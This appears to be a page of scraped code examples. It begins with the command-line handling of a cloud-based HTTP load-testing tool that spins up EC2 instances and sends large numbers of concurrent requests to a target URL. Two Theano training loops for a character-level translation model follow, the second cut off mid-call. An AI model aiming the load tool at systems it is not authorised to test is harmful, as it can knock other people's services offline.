                            type='string', default='',
                            help='Cookies to send during http requests. The cookies should be passed using standard cookie formatting, separated by semi-colons and assigned with equals signs.')
    attack_group.add_option('-c', '--concurrent', metavar="CONCURRENT", nargs=1,
                            action='store', dest='concurrent', type='int', default=100,
                            help="The number of concurrent connections to make to the target (default: 100).")
    attack_group.add_option('-H', '--headers', metavar="HEADERS", nargs=1,
                            action='store', dest='headers', type='string', default='',
                            help="HTTP headers to send to the target to attack. Multiple headers should be separated by semi-colons, e.g header1:value1;header2:value2")
    attack_group.add_option('-e', '--csv', metavar="FILENAME", nargs=1,
                            action='store', dest='csv_filename', type='string', default='',
                            help="Store the distribution of results in a csv file for all completed bees (default: '').")
    attack_group.add_option('-P', '--contenttype', metavar="CONTENTTYPE", nargs=1,
                            action='store', dest='contenttype', type='string', default='text/plain',
                            help="ContentType header to send to the target of the attack.")
    attack_group.add_option('-I', '--sting', metavar="sting", nargs=1,
                            action='store', dest='sting', type='int', default=1,
                            help="The flag to sting (ping to cache) url before attack (default: 1). 0: no sting, 1: sting sequentially, 2: sting in parallel")
    attack_group.add_option('-S', '--seconds', metavar="SECONDS", nargs=1,
                            action='store', dest='seconds', type='int', default=60,
                            help= "hurl only: The number of total seconds to attack the target (default: 60).")
    attack_group.add_option('-X', '--verb', metavar="VERB", nargs=1,
                            action='store', dest='verb', type='string', default='',
                            help= "hurl only: Request command -HTTP verb to use -GET/PUT/etc. Default GET")
    attack_group.add_option('-M', '--rate', metavar="RATE", nargs=1,
                            action='store', dest='rate', type='int',
                            help= "hurl only: Max Request Rate.")
    attack_group.add_option('-a', '--threads', metavar="THREADS", nargs=1,
                            action='store', dest='threads', type='int', default=1,
                            help= "hurl only: Number of parallel threads. Default: 1")
    attack_group.add_option('-f', '--fetches', metavar="FETCHES", nargs=1,
                            action='store', dest='fetches', type='int', 
                            help= "hurl only: Num fetches per instance.")
    attack_group.add_option('-d', '--timeout', metavar="TIMEOUT", nargs=1,
                            action='store', dest='timeout', type='int',
                            help= "hurl only: Timeout (seconds).")
    attack_group.add_option('-E', '--send_buffer', metavar="SEND_BUFFER", nargs=1,
                            action='store', dest='send_buffer', type='int',
                            help= "hurl only: Socket send buffer size.")
    attack_group.add_option('-F', '--recv_buffer', metavar="RECV_BUFFER", nargs=1,
                            action='store', dest='recv_buffer', type='int',
                            help= "hurl only: Socket receive buffer size.")
    # Optional
    attack_group.add_option('-T', '--tpr', metavar='TPR', nargs=1, action='store', dest='tpr', default=None, type='float',
                            help='The upper bounds for time per request. If this option is passed and the target is below the value a 1 will be returned with the report details (default: None).')
    attack_group.add_option('-R', '--rps', metavar='RPS', nargs=1, action='store', dest='rps', default=None, type='float',
                            help='The lower bounds for request per second. If this option is passed and the target is above the value a 1 will be returned with the report details (default: None).')
    attack_group.add_option('-A', '--basic_auth', metavar='basic_auth', nargs=1, action='store', dest='basic_auth', default='', type='string',
                            help='BASIC authentication credentials, format auth-username:password (default: None).')
    attack_group.add_option('-j', '--hurl', metavar="HURL_COMMANDS",
                            action='store_true', dest='hurl',
                            help="use hurl")
    attack_group.add_option('-o', '--long_output', metavar="LONG_OUTPUT",
                            action='store_true', dest='long_output',
                            help="display hurl output")
    attack_group.add_option('-L', '--responses_per', metavar="RESPONSE_PER",
                            action='store_true', dest='responses_per',
                            help="hurl only: Display http(s) response codes per interval instead of request statistics")


    parser.add_option_group(attack_group)

    (options, args) = parser.parse_args()

    if len(args) <= 0:
        parser.error('Please enter a command.')

    command = args[0]
    #set time for in between threads
    delay = 0.2

    if command == 'up':
        if not options.key:
            parser.error('To spin up new instances you need to specify a key-pair name with -k')

        if options.group == 'default':
            print('New bees will use the "default" EC2 security group. Please note that port 22 (SSH) is not normally open on this group. You will need to use to the EC2 tools to open it before you will be able to attack.')
        zone_len = options.zone.split(',')
        if len(zone_len) > 1:
            if len(options.instance.split(',')) != len(zone_len):
                print("Your instance count does not match zone count")
                sys.exit(1)
            else:
                ami_list = [a for a in options.instance.split(',')]
                zone_list = [z for z in zone_len]
                # for each ami and zone set zone and instance
                for tup_val in zip(ami_list, zone_list):
                    options.instance, options.zone = tup_val
                    threading.Thread(target=bees.up, args=(options.servers, options.group,
                                                            options.zone, options.instance,
                                                            options.type,options.login,
                                                            options.key, options.subnet,
                                                            options.bid)).start()
                    #time allowed between threads
                    time.sleep(delay)
        else:
            bees.up(options.servers, options.group, options.zone, options.instance, options.type, options.login, options.key, options.subnet, options.bid)

    elif command == 'attack':
        if not options.url:
            parser.error('To run an attack you need to specify a url with -u')

        regions_list = []
        for region in bees._get_existing_regions():
                regions_list.append(region)

        # urlparse needs a scheme in the url. ab doesn't, so add one just for the sake of parsing.
        # urlparse('google.com').path == 'google.com' and urlparse('google.com').netloc == '' -> True
        parsed = urlparse(options.url) if '://' in options.url else urlparse('http://'+options.url)
        if parsed.path == '':
            options.url += '/'
        additional_options = dict(
            cookies=options.cookies,
            headers=options.headers,
            post_file=options.post_file,
            keep_alive=options.keep_alive,
            mime_type=options.mime_type,
            csv_filename=options.csv_filename,
            tpr=options.tpr,
            rps=options.rps,
            basic_auth=options.basic_auth,
            contenttype=options.contenttype,
            sting=options.sting,
            hurl=options.hurl,
            seconds=options.seconds,
            rate=options.rate,
            long_output=options.long_output,
            responses_per=options.responses_per,
            verb=options.verb,
            threads=options.threads,
            fetches=options.fetches,
            timeout=options.timeout,
            send_buffer=options.send_buffer,
            recv_buffer=options.recv_buffer
        )
        if options.hurl:
            for region in regions_list:
                additional_options['zone'] = region
                threading.Thread(target=bees.hurl_attack, args=(options.url, options.number, options.concurrent),
                    kwargs=additional_options).start()
                #time allowed between threads
                time.sleep(delay)
        else:
            for region in regions_list:
                additional_options['zone'] = region
                threading.Thread(target=bees.attack, args=(options.url, options.number,
                    options.concurrent), kwargs=additional_options).start()
                #time allowed between threads
                time.sleep(delay)

    elif command == 'down':
        bees.down()
    elif command == 'report':
        bees.report()

Example 173

Project: dl4mt-c2c Source File: nmt.py
def train(
      highway=2,
      dim_word=100,
      dim_word_src=200,
      enc_dim=1000,
      dec_dim=1000,  # the number of LSTM units
      model_name="model_name",
      conv_width=4,
      conv_nkernels=256,
      pool_window=-1,
      pool_stride=-1,
      patience=-1,  # early stopping patience
      max_epochs=5000,
      finish_after=-1,  # finish after this many updates
      decay_c=0.,  # L2 regularization penalty
      alpha_c=0.,  # alignment regularization
      clip_c=-1.,  # gradient clipping threshold
      lrate=0.01,  # learning rate
      n_words_src=100000,  # source vocabulary size
      n_words=100000,  # target vocabulary size
      maxlen=1000,  # maximum length of the description
      maxlen_trg=1000,  # maximum length of the description
      maxlen_sample=1000,
      optimizer='rmsprop',
      batch_size=16,
      valid_batch_size=16,
      sort_size=20,
      model_path=None,
      save_file_name='model',
      save_best_models=0,
      dispFreq=100,
      validFreq=100,
      saveFreq=1000,   # save the parameters after every saveFreq updates
      sampleFreq=-1,
      pbatchFreq=-1,
      verboseFreq=10000,
      datasets=[
          'data/lisatmp3/chokyun/europarl/europarl-v7.fr-en.en.tok',
          '/data/lisatmp3/chokyun/europarl/europarl-v7.fr-en.fr.tok'],
      valid_datasets=['../data/dev/newstest2011.en.tok',
                      '../data/dev/newstest2011.fr.tok'],
      dictionaries=[
          '/data/lisatmp3/chokyun/europarl/europarl-v7.fr-en.en.tok.pkl',
          '/data/lisatmp3/chokyun/europarl/europarl-v7.fr-en.fr.tok.pkl'],
      source_word_level=0,
      target_word_level=0,
      dropout_gru=False,
      dropout_softmax=False,
      re_load=False,
      re_load_old_setting=False,
      uidx=None,
      eidx=None,
      cidx=None,
      layers=None,
      save_every_saveFreq=0,
      save_burn_in=20000,
      use_bpe=0,
      quit_immediately=False,
      init_params=None,
      build_model=None,
      build_sampler=None,
      gen_sample=None,
      prepare_data=None,
      **kwargs
    ):

    # Model options
    model_options = locals().copy()
    del model_options['init_params']
    del model_options['build_model']
    del model_options['build_sampler']
    del model_options['gen_sample']
    del model_options['prepare_data']

    # load dictionaries and invert them
    worddicts = [None] * len(dictionaries)
    worddicts_r = [None] * len(dictionaries)
    for ii, dd in enumerate(dictionaries):
        with open(dd, 'rb') as f:
            worddicts[ii] = cPickle.load(f)
        worddicts_r[ii] = dict()
        for kk, vv in worddicts[ii].iteritems():
            worddicts_r[ii][vv] = kk

    print 'Building model'
    if not os.path.exists(model_path):
        os.makedirs(model_path)

    file_name = '%s%s.npz' % (model_path, save_file_name)
    best_file_name = '%s%s.best.npz' % (model_path, save_file_name)
    opt_file_name = '%s%s%s.npz' % (model_path, save_file_name, '.grads')
    best_opt_file_name = '%s%s%s.best.npz' % (model_path, save_file_name, '.grads')
    model_name = '%s%s.pkl' % (model_path, save_file_name)
    params = init_params(model_options)

    cnt = 0
    cnt_emb = 0
    conv_params, hw_params = 0, 0
    for kk, vv in params.iteritems():
        if (kk == "Wemb"):
            print kk, vv.size
            cnt_emb += vv.size
        if "conv" in kk:
            print kk, vv.size
            conv_params += vv.size
        if "hw" in kk:
            print kk, vv.size
            hw_params += vv.size
        cnt += vv.size
    print "# Total params:", cnt
    print "# Emb params:", cnt_emb
    print "# Conv params:", conv_params
    print "# HW params:", hw_params
    print "# Input params:", cnt_emb + conv_params + hw_params

    if quit_immediately:
        sys.exit(1)

    cPickle.dump(model_options, open(model_name, 'wb'))
    history_errs = []

    # reload options
    # reload : False
    if re_load and os.path.exists(file_name):
        print 'You are reloading your experiment.. do not panic dude..'
        if re_load_old_setting:
            with open(model_name, 'rb') as f:
                models_options = cPickle.load(f)
        params = load_params(file_name, params)
        # reload history
        model = numpy.load(file_name)
        history_errs = list(model['history_errs'])
        if uidx is None:
            uidx = model['uidx']
        if eidx is None:
            eidx = model['eidx']
        if cidx is None:
            try:
                cidx = model['cidx']
            except:
                cidx = 0
    else:
        if uidx is None:
            uidx = 0
        if eidx is None:
            eidx = 0
        if cidx is None:
            cidx = 0

    print 'Loading data'
    train = TextIterator(source=datasets[0],
                         target=datasets[1],
                         source_dict=dictionaries[0],
                         target_dict=dictionaries[1],
                         n_words_source=n_words_src,
                         n_words_target=n_words,
                         source_word_level=source_word_level,
                         target_word_level=target_word_level,
                         batch_size=batch_size,
                         sort_size=sort_size)

    valid = TextIterator(source=valid_datasets[0],
                         target=valid_datasets[1],
                         source_dict=dictionaries[0],
                         target_dict=dictionaries[1],
                         n_words_source=n_words_src,
                         n_words_target=n_words,
                         source_word_level=source_word_level,
                         target_word_level=target_word_level,
                         batch_size=valid_batch_size,
                         sort_size=sort_size)

    # create shared variables for parameters
    tparams = init_tparams(params)

    trng, use_noise, \
        x, x_mask, y, y_mask, \
        opt_ret, \
        cost = \
        build_model(tparams, model_options)
    # NOTE : this is where we build the model
    inps = [x, x_mask, y, y_mask]

    print 'Building sampler...\n',
    f_init, f_next = build_sampler(tparams, model_options, trng, use_noise)
    #print 'Done'

    # before any regularizer
    print 'Building f_log_probs...',
    f_log_probs = theano.function(inps, cost, profile=profile)
    # NOTE : f_log_probs : [x, x_mask, y, y_mask], cost
    print 'Done'

    if re_load: 
        use_noise.set_value(0.)
        valid_errs = pred_probs(f_log_probs,
                                prepare_data,
                                model_options,
                                valid,
                                pool_stride,
                                verboseFreq=verboseFreq,
                               )
        valid_err = valid_errs.mean()

        if numpy.isnan(valid_err):
            import ipdb
            ipdb.set_trace()

        print 'Reload sanity check: Valid ', valid_err

    cost = cost.mean()

    # apply L2 regularization on weights
    # decay_c : 0
    if decay_c > 0.:
        decay_c = theano.shared(numpy.float32(decay_c), name='decay_c')
        weight_decay = 0.
        for kk, vv in tparams.iteritems():
            weight_decay += (vv ** 2).sum()
        weight_decay *= decay_c
        cost += weight_decay

    # regularize the alpha weights
    # alpha_c : 0
    if alpha_c > 0. and not model_options['decoder'].endswith('simple'):
        alpha_c = theano.shared(numpy.float32(alpha_c), name='alpha_c')
        alpha_reg = alpha_c * (
            (tensor.cast(y_mask.sum(0) // x_mask.sum(0), 'float32')[:, None] -
             opt_ret['dec_alphas'].sum(0))**2).sum(1).mean()
        cost += alpha_reg

    # after all regularizers - compile the computational graph for cost
    print 'Building f_cost...',
    f_cost = theano.function(inps, cost, profile=profile)
    # NOTE : why is this not referenced somewhere later?
    print 'Done'

    print 'Computing gradient...',
    grads = tensor.grad(cost, wrt=itemlist(tparams))
    print 'Done'

    if clip_c > 0:
        grads, not_finite, clipped = gradient_clipping(grads, tparams, clip_c)
    else:
        not_finite = 0
        clipped = 0

    # compile the optimizer, the actual computational graph is compiled here
    lr = tensor.scalar(name='lr')
    print 'Building optimizers...',
    if re_load and os.path.exists(file_name):
        if clip_c > 0:
            f_grad_shared, f_update, toptparams = eval(optimizer)(lr, tparams, grads, inps, cost=cost,
                                                                  not_finite=not_finite, clipped=clipped,
                                                                  file_name=opt_file_name)
        else:
            f_grad_shared, f_update, toptparams = eval(optimizer)(lr, tparams, grads, inps, cost=cost,
                                                                  file_name=opt_file_name)
    else:
        # re_load = False, clip_c = 1
        if clip_c > 0:
            f_grad_shared, f_update, toptparams = eval(optimizer)(lr, tparams, grads, inps, cost=cost,
                                                                  not_finite=not_finite, clipped=clipped)
        else:
            f_grad_shared, f_update, toptparams = eval(optimizer)(lr, tparams, grads, inps, cost=cost)

            # f_grad_shared = theano.function(inp, [cost, not_finite, clipped], updates=gsup, profile=profile)

            # f_update = theano.function([lr], [], updates=updates,
            #                   on_unused_input='ignore', profile=profile)
            # toptparams

    print 'Done'

    print 'Optimization'
    best_p = None
    bad_counter = 0

    if validFreq == -1:
        validFreq = len(train[0]) / batch_size
    if saveFreq == -1:
        saveFreq = len(train[0]) / batch_size

    # Training loop
    ud_start = time.time()
    estop = False

    if re_load:
        print "Checkpointed minibatch number: %d" % cidx
        for cc in xrange(cidx):
            if numpy.mod(cc, 1000)==0:
                print "Jumping [%d / %d] examples" % (cc, cidx)
            train.next()

    for epoch in xrange(max_epochs):
        time0 = time.time()
        n_samples = 0
        NaN_grad_cnt = 0
        NaN_cost_cnt = 0
        clipped_cnt = 0
        if re_load:
            re_load = 0
        else:
            cidx = 0

        for x, y in train:
        # NOTE : x, y are [sen1, sen2, sen3 ...] where sen_i are of different length
        # NOTE : at this time, x, y are simply python lists
        # NOTE : after prepare_data they get converted to numpy lists
            cidx += 1
            uidx += 1
            use_noise.set_value(1.)

            x, x_mask, y, y_mask, n_x = prepare_data(x,
                                                     y,
                                                     pool_stride,
                                                     maxlen=maxlen,
                                                     maxlen_trg=maxlen_trg,
                                                    )

            if uidx == 1 or ( numpy.mod(uidx, pbatchFreq) == 0 and pbatchFreq != -1 ):
                pbatch(x, worddicts_r[0])

            if x is None:
                print 'Minibatch with zero sample under length ', maxlen
                uidx -= 1
                uidx = max(uidx, 0)
                continue

            n_samples += n_x

            # compute cost, grads and copy grads to shared variables

            if clip_c > 0:
                cost, not_finite, clipped = f_grad_shared(x, x_mask, y, y_mask)
            else:
                cost = f_grad_shared(x, x_mask, y, y_mask)

            if clipped:
                clipped_cnt += 1

            # check for bad numbers, usually we remove non-finite elements
            # and continue training - but not done here
            if numpy.isnan(cost) or numpy.isinf(cost):
                import ipdb
                ipdb.set_trace()
                NaN_cost_cnt += 1

            if not_finite:
                import ipdb
                ipdb.set_trace()
                NaN_grad_cnt += 1
                continue

            # do the update on parameters
            f_update(lrate)

            if numpy.isnan(cost) or numpy.isinf(cost):
                continue

            if float(NaN_grad_cnt) > max_epochs * 0.5 or float(NaN_cost_cnt) > max_epochs * 0.5:
                print 'Too many NaNs, abort training'
                return 1., 1., 1.

            # verbose
            if numpy.mod(uidx, dispFreq) == 0:
                ud = time.time() - ud_start
                wps = n_samples / float(time.time() - time0)
                print 'Epoch ', eidx, 'Update ', uidx, 'Cost ', cost, 'NaN_in_grad', NaN_grad_cnt,\
                      'NaN_in_cost', NaN_cost_cnt, 'Gradient_clipped', clipped_cnt, 'UD ', ud, "%.2f sentences/s" % wps
                ud_start = time.time()

            # generate some samples with the model and display them
            if numpy.mod(uidx, sampleFreq) == 0 and sampleFreq != -1:
                for jj in xrange(numpy.minimum(5, x.shape[1])):
                    # jj = min(5, n_samples)
                    stochastic = True
                    use_noise.set_value(0.)

                    # x : maxlen X n_samples
                    sample, score = gen_sample(tparams, f_init, f_next,
                                               x[:, jj][:, None],
                                               model_options, trng=trng, k=1,
                                               maxlen=maxlen_sample,
                                               stochastic=stochastic,
                                               argmax=False)
                    print
                    print 'Source ', jj, ': ',
                    if source_word_level:
                        for vv in x[:, jj]:
                            if vv == 0:
                                break
                            if vv in worddicts_r[0]:
                                if use_bpe:
                                    print (worddicts_r[0][vv]).replace('@@', ''),
                                else:
                                    print worddicts_r[0][vv],
                            else:
                                print 'UNK',
                        print
                    else:
                        source_ = []
                        for ii, vv in enumerate(x[:, jj]):
                            if vv == 0 or vv == 2 or vv == 3:
                                continue

                            if vv in worddicts_r[0]:
                                source_.append(worddicts_r[0][vv])
                            else:
                                source_.append('UNK')
                        print "".join(source_)
                    print 'Truth ', jj, ' : ',
                    if target_word_level:
                        for vv in y[:, jj]:
                            if vv == 0:
                                break
                            if vv in worddicts_r[1]:
                                if use_bpe:
                                    print (worddicts_r[1][vv]).replace('@@', ''),
                                else:
                                    print worddicts_r[1][vv],
                            else:
                                print 'UNK',
                        print
                    else:
                        truth_ = []
                        for vv in y[:, jj]:
                            if vv == 0:
                                break
                            if vv in worddicts_r[1]:
                                truth_.append(worddicts_r[1][vv])
                            else:
                                truth_.append('UNK')
                        print "".join(truth_)
                    print 'Sample ', jj, ': ',
                    if stochastic:
                        ss = sample
                    else:
                        score = score / numpy.array([len(s) for s in sample])
                        ss = sample[score.argmin()]
                    if target_word_level:
                        for vv in ss:
                            if vv == 0:
                                break
                            if vv in worddicts_r[1]:
                                if use_bpe:
                                    print (worddicts_r[1][vv]).replace('@@', ''),
                                else:
                                    print worddicts_r[1][vv],
                            else:
                                print 'UNK',
                        print
                    else:
                        sample_ = []
                        for vv in ss:
                            if vv == 0:
                                break
                            if vv in worddicts_r[1]:
                                sample_.append(worddicts_r[1][vv])
                            else:
                                sample_.append('UNK')
                        print "".join(sample_)
                    print

            # validate model on validation set and early stop if necessary
            if numpy.mod(uidx, validFreq) == 0:
                use_noise.set_value(0.)

                valid_errs = pred_probs(f_log_probs,
                                        prepare_data,
                                        model_options,
                                        valid,
                                        pool_stride,
                                        verboseFreq=verboseFreq,
                                       )
                valid_err = valid_errs.mean()
                history_errs.append(valid_err)

                if uidx == 0 or valid_err <= numpy.array(history_errs).min():
                    best_p = unzip(tparams)
                    best_optp = unzip(toptparams)
                    bad_counter = 0

                if saveFreq != validFreq and save_best_models:
                    numpy.savez(best_file_name, history_errs=history_errs, uidx=uidx, eidx=eidx,
                                cidx=cdix, **best_p)
                    numpy.savez(best_opt_file_name, **best_optp)

                if len(history_errs) > patience and valid_err >= \
                        numpy.array(history_errs)[:-patience].min() and patience != -1:
                    bad_counter += 1
                    if bad_counter > patience:
                        print 'Early Stop!'
                        estop = True
                        break

                if numpy.isnan(valid_err):
                    import ipdb
                    ipdb.set_trace()

                print 'Valid ', valid_err

            # save the best model so far
            if numpy.mod(uidx, saveFreq) == 0:
                print 'Saving...',

                if not os.path.exists(model_path):
                    os.mkdir(model_path)

                params = unzip(tparams)
                optparams = unzip(toptparams)
                numpy.savez(file_name, history_errs=history_errs, uidx=uidx, eidx=eidx,
                            cidx=cidx, **params)
                numpy.savez(opt_file_name, **optparams)

                if save_every_saveFreq and (uidx >= save_burn_in):
                    this_file_name = '%s%s.%d.npz' % (model_path, save_file_name, uidx)
                    this_opt_file_name = '%s%s%s.%d.npz' % (model_path, save_file_name, '.grads', uidx)
                    numpy.savez(this_file_name, history_errs=history_errs, uidx=uidx, eidx=eidx,
                                cidx=cidx, **params)
                    numpy.savez(this_opt_file_name, history_errs=history_errs, uidx=uidx, eidx=eidx,
                                cidx=cidx, **params)
                    if best_p is not None and saveFreq != validFreq:
                        this_best_file_name = '%s%s.%d.best.npz' % (model_path, save_file_name, uidx)
                        numpy.savez(this_best_file_name, history_errs=history_errs, uidx=uidx, eidx=eidx,
                                    cidx=cidx, **best_p)
                print 'Done...',
                print 'Saved to %s' % file_name

            # finish after this many updates
            if uidx >= finish_after and finish_after != -1:
                print 'Finishing after %d iterations!' % uidx
                estop = True
                break

        print 'Seen %d samples' % n_samples
        eidx += 1

        if estop:
            break

    use_noise.set_value(0.)
    valid_err = pred_probs(f_log_probs,
                           prepare_data,
                           model_options,
                           valid,
                           pool_stride,
                          ).mean()

    print 'Valid ', valid_err

    params = unzip(tparams)
    optparams = unzip(toptparams)
    file_name = '%s%s.%d.npz' % (model_path, save_file_name, uidx)
    opt_file_name = '%s%s%s.%d.npz' % (model_path, save_file_name, '.grads', uidx)
    numpy.savez(file_name, history_errs=history_errs, uidx=uidx, eidx=eidx, cidx=cidx, **params)
    numpy.savez(opt_file_name, **optparams)
    if best_p is not None and saveFreq != validFreq:
        best_file_name = '%s%s.%d.best.npz' % (model_path, save_file_name, uidx)
        best_opt_file_name = '%s%s%s.%d.best.npz' % (model_path, save_file_name, '.grads',uidx)
        numpy.savez(best_file_name, history_errs=history_errs, uidx=uidx, eidx=eidx, cidx=cidx, **best_p)
        numpy.savez(best_opt_file_name, **best_optp)

    return valid_err

Example 174

Project: dl4mt-c2c Source File: nmt_many.py
def train(
      highway=2,
      dim_word=100,
      dim_word_src=200,
      enc_dim=1000,
      dec_dim=1000,  # the number of LSTM units
      model_name="model_name",
      conv_width=4,
      conv_nkernels=256,
      pool_window=-1,
      pool_stride=-1,
      patience=-1,  # early stopping patience
      max_epochs=5000,
      finish_after=-1,  # finish after this many updates
      decay_c=0.,  # L2 regularization penalty
      alpha_c=0.,  # alignment regularization
      clip_c=-1.,  # gradient clipping threshold
      lrate=0.01,  # learning rate
      n_words_src=100000,  # source vocabulary size
      n_words=100000,  # target vocabulary size
      maxlen=1000,  # maximum length of the description
      maxlen_trg=1000,  # maximum length of the description
      maxlen_sample=1000,
      optimizer='rmsprop',
      batch_size=[1,2,3,4],
      valid_batch_size=16,
      sort_size=20,
      model_path=None,
      save_file_name='model',
      save_best_models=0,
      dispFreq=100,
      validFreq=100,
      saveFreq=1000,   # save the parameters after every saveFreq updates
      sampleFreq=-1,
      pbatchFreq=-1,
      verboseFreq=10000,
      datasets=[
          'data/lisatmp3/chokyun/europarl/europarl-v7.fr-en.en.tok',
          '/data/lisatmp3/chokyun/europarl/europarl-v7.fr-en.fr.tok'],
      valid_datasets=['../data/dev/newstest2011.en.tok',
                      '../data/dev/newstest2011.fr.tok'],
      dictionaries=[
          '/data/lisatmp3/chokyun/europarl/europarl-v7.fr-en.en.tok.pkl',
          '/data/lisatmp3/chokyun/europarl/europarl-v7.fr-en.fr.tok.pkl'],
      source_word_level=0,
      target_word_level=0,
      dropout_gru=False,
      dropout_softmax=False,
      re_load=False,
      re_load_old_setting=False,
      uidx=None,
      eidx=None,
      cidx=None,
      layers=None,
      save_every_saveFreq=0,
      save_burn_in=20000,
      use_bpe=0,
      quit_immediately=False,
      init_params=None,
      build_model=None,
      build_sampler=None,
      gen_sample=None,
      prepare_data=None,
      **kwargs
    ):

    # Model options
    model_options = locals().copy()
    del model_options['init_params']
    del model_options['build_model']
    del model_options['build_sampler']
    del model_options['gen_sample']
    del model_options['prepare_data']

    # load dictionaries and invert them
    worddicts = [None] * len(dictionaries)
    worddicts_r = [None] * len(dictionaries)
    for ii, dd in enumerate(dictionaries):
        with open(dd, 'rb') as f:
            worddicts[ii] = cPickle.load(f)
        worddicts_r[ii] = dict()
        for kk, vv in worddicts[ii].iteritems():
            worddicts_r[ii][vv] = kk

    print 'Building model'
    if not os.path.exists(model_path):
        os.makedirs(model_path)

    file_name = '%s%s.npz' % (model_path, save_file_name)
    best_file_name = '%s%s.best.npz' % (model_path, save_file_name)
    opt_file_name = '%s%s%s.npz' % (model_path, save_file_name, '.grads')
    best_opt_file_name = '%s%s%s.best.npz' % (model_path, save_file_name, '.grads')
    model_name = '%s%s.pkl' % (model_path, save_file_name)
    params = init_params(model_options)

    cnt = 0
    cnt_emb = 0
    conv_params, hw_params = 0, 0
    for kk, vv in params.iteritems():
        if (kk == "Wemb"):
            print kk, vv.size
            cnt_emb += vv.size
        if "conv" in kk:
            print kk, vv.size
            conv_params += vv.size
        if "hw" in kk:
            print kk, vv.size
            hw_params += vv.size
        cnt += vv.size
    print "# Total params:", cnt
    print "# Emb params:", cnt_emb
    print "# Conv params:", conv_params
    print "# HW params:", hw_params
    print "# Input params:", cnt_emb + conv_params + hw_params

    if quit_immediately:
        sys.exit(1)

    cPickle.dump(model_options, open(model_name, 'wb'))
    history_errs = [[],[],[],[]]

    # reload options
    # reload : False
    if re_load and os.path.exists(file_name):
        print 'You are reloading your experiment.. do not panic dude..'
        if re_load_old_setting:
            with open(model_name, 'rb') as f:
                models_options = cPickle.load(f)
        params = load_params(file_name, params)
        # reload history
        model = numpy.load(file_name)
        history_errs = list(lst.tolist() for lst in model['history_errs'])
        if uidx is None:
            uidx = model['uidx']
        if eidx is None:
            eidx = model['eidx']
        if cidx is None:
            try:
                cidx = model['cidx']
            except:
                cidx = 0
    else:
        if uidx is None:
            uidx = 0
        if eidx is None:
            eidx = 0
        if cidx is None:
            cidx = 0

    print 'Loading data'
    train = MultiTextIterator(source=datasets[0],
                         target=datasets[1],
                         source_dict=dictionaries[0],
                         target_dict=dictionaries[1],
                         n_words_source=n_words_src,
                         n_words_target=n_words,
                         source_word_level=source_word_level,
                         target_word_level=target_word_level,
                         batch_size=batch_size,
                         sort_size=sort_size)

    valid = [TextIterator(source=valid_dataset[0],
                         target=valid_dataset[1],
                         source_dict=dictionaries[0],
                         target_dict=dictionaries[1],
                         n_words_source=n_words_src,
                         n_words_target=n_words,
                         source_word_level=source_word_level,
                         target_word_level=target_word_level,
                         batch_size=valid_batch_size,
                         sort_size=sort_size) for valid_dataset in valid_datasets]

    # create shared variables for parameters
    tparams = init_tparams(params)

    trng, use_noise, \
        x, x_mask, y, y_mask, \
        opt_ret, \
        cost = \
        build_model(tparams, model_options)
    # NOTE : this is where we build the model
    inps = [x, x_mask, y, y_mask]

    print 'Building sampler...\n',
    f_init, f_next = build_sampler(tparams, model_options, trng, use_noise)
    #print 'Done'

    # before any regularizer
    print 'Building f_log_probs...',
    f_log_probs = theano.function(inps, cost, profile=profile)
    # NOTE : f_log_probs : [x, x_mask, y, y_mask], cost
    print 'Done'

    if re_load: 
        use_noise.set_value(0.)
        valid_scores = []
        for ii, vv in enumerate(valid):

            valid_err = pred_probs(f_log_probs,
                                   prepare_data,
                                   model_options,
                                   vv,
                                   pool_stride,
                                   verboseFreq=verboseFreq,
                                  ).mean()
            valid_err = valid_err.mean()

            if numpy.isnan(valid_err):
                import ipdb
                ipdb.set_trace()

            print 'Reload sanity check: Valid ', valid_err

    cost = cost.mean()

    # apply L2 regularization on weights
    # decay_c : 0
    if decay_c > 0.:
        decay_c = theano.shared(numpy.float32(decay_c), name='decay_c')
        weight_decay = 0.
        for kk, vv in tparams.iteritems():
            weight_decay += (vv ** 2).sum()
        weight_decay *= decay_c
        cost += weight_decay

    # regularize the alpha weights
    # alpha_c : 0
    if alpha_c > 0. and not model_options['decoder'].endswith('simple'):
        alpha_c = theano.shared(numpy.float32(alpha_c), name='alpha_c')
        alpha_reg = alpha_c * (
            (tensor.cast(y_mask.sum(0) // x_mask.sum(0), 'float32')[:, None] -
             opt_ret['dec_alphas'].sum(0))**2).sum(1).mean()
        cost += alpha_reg

    # after all regularizers - compile the computational graph for cost
    print 'Building f_cost...',
    f_cost = theano.function(inps, cost, profile=profile)
    # NOTE : why is this not referenced somewhere later?
    print 'Done'

    print 'Computing gradient...',
    grads = tensor.grad(cost, wrt=itemlist(tparams))
    print 'Done'

    if clip_c > 0:
        grads, not_finite, clipped = gradient_clipping(grads, tparams, clip_c)
    else:
        not_finite = 0
        clipped = 0

    # compile the optimizer, the actual computational graph is compiled here
    lr = tensor.scalar(name='lr')
    print 'Building optimizers...',
    if re_load and os.path.exists(file_name):
        if clip_c > 0:
            f_grad_shared, f_update, toptparams = eval(optimizer)(lr, tparams, grads, inps, cost=cost,
                                                                  not_finite=not_finite, clipped=clipped,
                                                                  file_name=opt_file_name)
        else:
            f_grad_shared, f_update, toptparams = eval(optimizer)(lr, tparams, grads, inps, cost=cost,
                                                                  file_name=opt_file_name)
    else:
        # re_load = False, clip_c = 1
        if clip_c > 0:
            f_grad_shared, f_update, toptparams = eval(optimizer)(lr, tparams, grads, inps, cost=cost,
                                                                  not_finite=not_finite, clipped=clipped)
        else:
            f_grad_shared, f_update, toptparams = eval(optimizer)(lr, tparams, grads, inps, cost=cost)

            # f_grad_shared = theano.function(inp, [cost, not_finite, clipped], updates=gsup, profile=profile)

            # f_update = theano.function([lr], [], updates=updates,
            #                   on_unused_input='ignore', profile=profile)
            # toptparams

    print 'Done'

    print 'Optimization'
    best_p = None
    bad_counter = 0

    if validFreq == -1:
        validFreq = len(train[0]) / batch_size
    if saveFreq == -1:
        saveFreq = len(train[0]) / batch_size

    # Training loop
    ud_start = time.time()
    estop = False

    if re_load:
        print "Checkpointed minibatch number: %d" % cidx
        for cc in xrange(cidx):
            if numpy.mod(cc, 1000)==0:
                print "Jumping [%d / %d] examples" % (cc, cidx)
            train.next()

    for epoch in xrange(max_epochs):
        time0 = time.time()
        n_samples = 0
        NaN_grad_cnt = 0
        NaN_cost_cnt = 0
        clipped_cnt = 0
        update_idx = 0
        if re_load:
            re_load = 0
        else:
            cidx = 0

        for x, y in train:
        # NOTE : x, y are [sen1, sen2, sen3 ...] where sen_i are of different length
            update_idx += 1
            cidx += 1
            uidx += 1
            use_noise.set_value(1.)

            x, x_mask, y, y_mask, n_x = prepare_data(x,
                                                     y,
                                                     pool_stride,
